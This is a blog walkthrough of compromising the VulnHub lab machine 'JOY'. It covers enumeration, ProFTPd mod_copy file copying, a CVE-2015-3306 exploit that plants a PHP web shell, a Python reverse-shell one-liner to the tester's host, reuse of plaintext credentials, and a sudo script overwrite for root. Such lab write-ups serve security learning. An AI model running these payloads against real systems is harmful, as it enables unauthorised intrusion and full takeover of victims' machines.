18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Digitalworld.local: JOY

9 months ago n0w4n

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

nmap scan for open ports + services

```
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 The Good Tech Inc. FTP Server
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES TOP SASL AUTH-RESP-CODE PIPELINING STLS UIDL CAPA
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LITERAL+ capabilities more LOGIN-REFERRALS have LOGINDISABLEDA0001 post-login STARTTLS IDLE Pre-login SASL-IR IMAP4rev1 listed OK ENABLE ID
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
587/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Issuer: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-01-27T17:23:23
| Not valid after: 2032-10-05T17:23:23
| MD5: c8f9 a1cb ac3b baa1 f158 2916 d7bd d3b0
|_SHA-1: 5df6 1fce d31e e8c4 9bd9 b5b7 27fa 4f28 cfb9 34c6
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Issuer: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-01-27T17:23:23
| Not valid after: 2032-10-05T17:23:23
| MD5: c8f9 a1cb ac3b baa1 f158 2916 d7bd d3b0
|_SHA-1: 5df6 1fce d31e e8c4 9bd9 b5b7 27fa 4f28 cfb9 34c6
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.91%I=7%D=5/1%Time=608D1EE9%P=x86_64-pc-linux-gnu%r(Gener
SF:icLines,7F,"220\x20The\x20Good\x20Tech\x20Inc\.\x20FTP\x20Server\r\n500
SF:\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n500\x20I
SF:nvalid\x20command:\x20try\x20being\x20more\x20creative\r\n");
MAC Address: 00:0C:29:C0:74:CD (VMware)
Service Info: Hosts: JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -1s
| nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| JOY<00> Flags: <unique><active>
| JOY<03> Flags: <unique><active>
| JOY<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.12-Debian)
| Computer name: joy
| NetBIOS computer name: JOY\x00
| Domain name: \x00
| FQDN: joy
|_ System time: 2021-05-01T17:27:22+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-01T09:27:22
|_ start_date: N/A
```

SMB

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ enum4linux 192.168.58.137
...[SNIP]...

S-1-22-1-1000 Unix User\patrick (Local User)
S-1-22-1-1001 Unix User\ftp (Local User)
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ smbmap -R -H 192.168.58.137
[+] Guest session IP: 192.168.58.137:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.5.12-Debian)
```

FTP

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ ftp
ftp> open 192.168.58.137
Connected to 192.168.58.137.
220 The Good Tech Inc. FTP Server
Name (192.168.58.137:n0w4n): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 2110 May 1 09:36 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
```

Downloading all files

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ wget -r ftp://anonymous:pass@192.168.58.137/upload/
```

Result:

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137/upload]
└─$ ls -lah
total 60K
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 11:37 .
drwxr-xr-x 3 n0w4n n0w4n 4.0K May 1 11:37 ..
-rw-r--r-- 1 n0w4n n0w4n 2.1K May 1 09:36 directory
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_armadillo
-rw-r--r-- 1 n0w4n n0w4n 25 Jan 6 2019 project_bravado
-rw-r--r-- 1 n0w4n n0w4n 88 Jan 6 2019 project_desperado
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_emilio
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_flamingo
-rw-r--r-- 1 n0w4n n0w4n 7 Jan 6 2019 project_indigo
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_komodo
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_luyano
-rw-r--r-- 1 n0w4n n0w4n 8 Jan 6 2019 project_malindo
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_okacho
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_polento
-rw-r--r-- 1 n0w4n n0w4n 20 Jan 6 2019 project_ronaldinho
-rw-r--r-- 1 n0w4n n0w4n 55 Jan 6 2019 project_sicko
-rw-r--r-- 1 n0w4n n0w4n 57 Jan 6 2019 project_toto
-rw-r--r-- 1 n0w4n n0w4n 5 Jan 6 2019 project_uno
-rw-r--r-- 1 n0w4n n0w4n 9 Jan 6 2019 project_vivino
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_woranto
-rw-r--r-- 1 n0w4n n0w4n 20 Jan 6 2019 project_yolo
-rw-r--r-- 1 n0w4n n0w4n 180 Jan 6 2019 project_zoo
-rw-r--r-- 1 n0w4n n0w4n 24 Jan 6 2019 reminder
```

Reading all the files

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137/upload]
└─$ for i in $(ls); do echo -e "\nFiles ${i}:" && cat ${i}; done

Files directory:
Patrick's Directory

total 112
drwxr-xr-x 18 patrick patrick 4096 May 1 17:35 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
-rw-r--r-- 1 patrick patrick 0 May 1 17:35 daqXrKzBXEAioPed3hhUH77s3i1JBNsx.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw-r--r-- 1 patrick patrick 0 May 1 17:30 hXtY5duoaey2PEbG67z04d4ryycBKBfw.txt
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
-rw-r--r-- 1 patrick patrick 24 May 1 17:30 IUdSCvOu4GrXPvG16AifVYjMrO2JFRRgzqKdM56ojxsTsiaWXVO6lTNeKc1tQbE0.txt
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 24 May 1 17:35 S1LuMxniGge5pjszHuwwbrRN2ToI6jOIlRL5uk3iXFgrMd8FA9iDVFH65gkXXOCV.txt
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos

You should know where the directory can be accessed.

Information of this Machine!

Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

Files project_armadillo:

Files project_bravado:
This is a brave project!

Files project_desperado:
What happens when you have no idea what you are doing? Bang your head against the wall.

Files project_emilio:

Files project_flamingo:

Files project_indigo:
colour

Files project_komodo:

Files project_luyano:

Files project_malindo:
airline

Files project_okacho:

Files project_polento:

Files project_ronaldinho:
skilled footballer!

Files project_sicko:
Perhaps the head of development is secretly a sicko...

Files project_toto:
either a dog name, or the name of a lottery in singapore

Files project_uno:
ONE!

Files project_vivino:
wine app

Files project_woranto:

Files project_yolo:
you only live once!

Files project_zoo:
dog
cat
ant
bird
fish
hare
snake
mouse
eagle
rabbit
jaguar
python
penguin
peacock
phoenix
kangaroo
parakeet
mosquito
mousedeer
woodlouse
cockroach
kingfisher
rhinoceros
pondskater

Files reminder:
Lock down this machine!
```

The file `version_control` seems interesting.
From the SMB enumeration we know there is a user ftp.
So copying this file from the home folder of patrick to the home folder of ftp should work.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137]
└─$ nc 192.168.58.137 21
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137]
└─$ ftp
ftp> open 192.168.58.137
Connected to 192.168.58.137.
220 The Good Tech Inc. FTP Server
Name (192.168.58.137:n0w4n): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 3524 May 1 10:12 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
-rw-r--r-- 1 0 0 407 May 1 10:09 version_control
226 Transfer complete
ftp> get version_control
local: version_control remote: version_control
200 PORT command successful
150 Opening BINARY mode data connection for version_control (407 bytes)
226 Transfer complete
407 bytes received in 0.00 secs (5.2452 MB/s)
ftp> bye
221 Goodbye.
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137]
└─$ cat version_control
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
```

There are several known exploits to be found on the internet.
This one I’m using: https://github.com/t0kx/exploit-CVE-2015-3306

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ ./exploit.py --host 192.168.58.137 --port 21 --path /var/www/tryingharderisjoy
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 192.168.58.137:21
[+] Target exploited, acessing shell at http://192.168.58.137/backdoor.php
[+] Running whoami: www-data
[+] Done
```

Inside the python script is the parameter to use:

```
data = requests.get("http://" + self.__host + "/backdoor.php?cmd=whoami")
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ curl -s http://192.168.58.137/backdoor.php?cmd=id
proftpd: 192.168.58.128:43890: SITE cpto /tmp/.uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
```

Getting a revser shell with this backdoor

Payload:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.128",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

Result:

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ sudo nc -lvp 9999
[sudo] password for n0w4n:
listening on [any] 9999 ...
192.168.58.137: inverse host lookup failed: Host name lookup failure
connect to [192.168.58.128] from (UNKNOWN) [192.168.58.137] 47188
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
```

Time for the recon phase

```
www-data@JOY:/var/www/tryingharderisjoy$ cd ossec
cd ossec
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -lah
ls -lah
total 116K
drwxr-xr-x 8 www-data www-data 4.0K Jan 6 2019 .
drwxr-xr-x 3 www-data www-data 4.0K May 1 18:30 ..
-rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags
-rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess
-rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd
-rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB
-rw-r--r-- 1 www-data www-data 35K Jul 19 2016 LICENSE
-rw-r--r-- 1 www-data www-data 2.1K Jul 19 2016 README
-rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search
drwxr-xr-x 3 www-data www-data 4.0K Jul 19 2016 css
-rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt
drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 img
-rwxr-xr-x 1 www-data www-data 5.1K Jul 19 2016 index.php
drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 js
drwxr-xr-x 3 www-data www-data 4.0K Dec 28 2018 lib
-rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php
-rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy
-rwxr-xr-x 1 www-data www-data 2.5K Jul 19 2016 setup.sh
drwxr-xr-x 2 www-data www-data 4.0K Dec 28 2018 site
drwxrwxrwx 2 www-data www-data 4.0K Dec 28 2018 tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
```
```
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su root
su root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su patrick
su patrick
Password: apollo098765

patrick@JOY:/var/www/tryingharderisjoy/ossec$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
```
```
patrick@JOY:/var/www/tryingharderisjoy/ossec$ sudo -l
sudo -l
Matching Defaults entries for patrick on JOY:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on JOY:
(ALL) NOPASSWD: /home/patrick/script/test
```

First get access to the folder

```
patrick@JOY:~$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../script/
../script/
What permissions would you like to set the file to?
777
777
Currently changing file permissions, please wait.
Tidying up...
Done!
```

Then change the content of the file `test` and run it with the sudo command

```
patrick@JOY:~/script$ echo '#!/bin/bash' > test
echo '#!/bin/bash' > test
patrick@JOY:~/script$ echo '/bin/bash' >> test
echo '/bin/bash' >> test
patrick@JOY:~/script$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
root@JOY:/home/patrick/script# id
id
uid=0(root) gid=0(root) groups=0(root)
```

Final part

```
root@JOY:/home/patrick/script# cat /root/proof.txt
cat /root/proof.txt
Never grant sudo permissions on scripts that perform system functions!
```
Tags:

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.